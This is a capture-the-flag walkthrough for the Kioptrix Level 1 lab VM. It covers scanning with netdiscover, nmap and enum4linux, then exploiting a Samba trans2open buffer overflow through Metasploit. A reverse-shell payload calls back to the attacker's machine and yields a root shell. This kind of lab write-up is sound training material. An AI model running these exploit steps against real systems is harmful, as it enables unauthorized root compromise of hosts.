Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.
Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”
Without further ado, lets get started.
Kali Linux machine
Using the tool netdiscover I was able to find out our victim with the ip address of 192.168.182.151
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
Scanning and enumeration
I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.
root@kali:~# nmap -sS -T4 -A 192.168.182.151 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST Nmap scan report for 192.168.182.151 Host is up (0.00025s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32768/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-09-26T09:32:06 |_Not valid after: 2010-09-26T09:32:06 |_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 32768/tcp open status 1 (RPC #100024) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32768/udp status MAC Address: 00:0C:29:C2:C8:5D (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user:
, NetBIOS MAC: (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.25 ms 192.168.182.151 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds
Used nbtscan to scan for NetBIOS information.
Did a simple smb enumeration using enum4linux tool and found out the victim is running Samba 2.2.1a, which is vulnerable to Samba trans2open Overflow. The exploit can be located here.
root@kali:~# enum4linux -a 192.168.182.151
Samba TRANS2_OPEN Buffer Overflow
A description of this vulnerability is listed below, which is from rapid7’s Vulnerability & Exploit Database.With that, I used the metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.
Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
msf > use exploit/linux/samba/trans2open msf exploit(trans2open) > set RHOST 192.168.182.151 RHOST => 192.168.182.151 msf exploit(trans2open) > set LHOST 192.168.182.147 LHOST => 192.168.182.147 msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp PAYLOAD => linux/x86/shell_reverse_tcp msf exploit(trans2open) > exploit [*] Started reverse TCP handler on 192.168.182.147:4444 [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600 id uid=0(root) gid=0(root) groups=99(nobody) whoami root hostname kioptrix.level1
After getting root shell I found the flag in /var/spool/mail which said :
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”.
Well it that’s it for level 1. It will only get harder from here. Next is Level 2.